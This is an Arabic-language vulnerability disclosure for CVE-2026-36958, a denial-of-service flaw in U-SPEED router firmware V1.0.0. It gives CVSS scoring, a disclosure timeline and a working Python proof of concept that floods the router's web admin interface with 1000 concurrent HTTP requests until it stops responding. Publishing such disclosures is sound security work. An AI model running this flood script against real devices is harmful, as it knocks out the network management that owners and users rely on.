
إثبات المفهوم لـ CVE-2026-36958، وهي ثغرة رفض خدمة في برنامج جهاز التوجيه U-SPEED تستنزف الموارد عبر طلبات HTTP المتزامنة، مما يتسبب في توقف الواجهة الإلكترونية عن الاستجابة.
معرف CVE: CVE-2026-36958 التاريخ: 2026-04-29 المكتشف: Kirubel Solomne البائع: U-SPEED المنتج: راوتر U-SPEED إصدار البرنامج الثابت: V1.0.0 CWE: CWE-400 - استهلاك غير متحكم فيه للموارد
البرنامج الثابت V1.0.0 لراوتر U-SPEED عرضة لرفض الخدمة. من خلال إرسال عدد كبير من طلبات HTTP المتزامنة إلى نقاط نهاية عشوائية أو غير موجودة على واجهة الإدارة عبر الويب، يمكن للمهاجم استنزاف موارد النظام في خادم Boa HTTP المدمج. يؤدي هذا إلى توقف واجهة الويب الخاصة بالراوتر عن الاستجابة وقد يتطلب إعادة تشغيل يدوية لاستعادة التشغيل الطبيعي.
درجة CVSS v3.1: 7.5 (عالية)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| المقياس | القيمة |
|---|
| ناقل الهجوم | الشبكة |
| تعقيد الهجوم | منخفض |
| الامتيازات المطلوبة | لا شيء |
| تفاعل المستخدم | لا شيء |
| تأثير السرية | لا شيء |
| تأثير السلامة | لا شيء |
| تأثير التوافر | عالي |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router web interface is still responsive.")
السلوك المتوقع: يجب أن يتعامل الخادم مع الاتصالات المتزامنة بشكل سلس. السلوك الفعلي: تصبح واجهة الويب غير مستجيبة؛ يلزم إعادة تشغيل يدوية.
| التاريخ | الحدث |
|---|---|
| 2026-04-29 | تم اكتشاف الثغرة |
| 2026-04-29 | تم الإبلاغ إلى MITRE |
| 2026-04-29 | تم تعيين CVE-2026-36958 |
| 2026-04-29 | الإفصاح العام |